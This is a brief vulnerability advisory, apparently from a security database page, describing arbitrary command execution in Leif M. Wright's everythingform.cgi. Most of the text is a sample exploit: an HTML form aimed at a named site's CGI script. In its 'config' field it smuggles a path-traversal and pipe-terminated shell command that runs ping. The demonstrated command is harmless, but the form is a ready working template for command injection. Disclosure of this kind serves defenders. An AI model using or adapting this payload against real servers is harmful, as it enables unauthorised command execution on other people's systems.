|
Leif M. Wright everythingform.cgi Arbitrary Command Execution Vulnerability
Sample exploit: <form action="http://www.conservatives.net/someplace/everythingform.cgi" method=POST> <h1>everythingform.cgi exploit</h1> Command: <input type=text name=config value="../../../../../../../../bin/ping -c 5 www.foobar.com|"> <input type=hidden name=Name value="expletive deleted"> <input type=hidden name="e-mail" value="foo@bar.net"> <input type=hidden name=FavoriteColor value=Black> <input type=submit value=run> </form> |
|
|
Privacy Statement |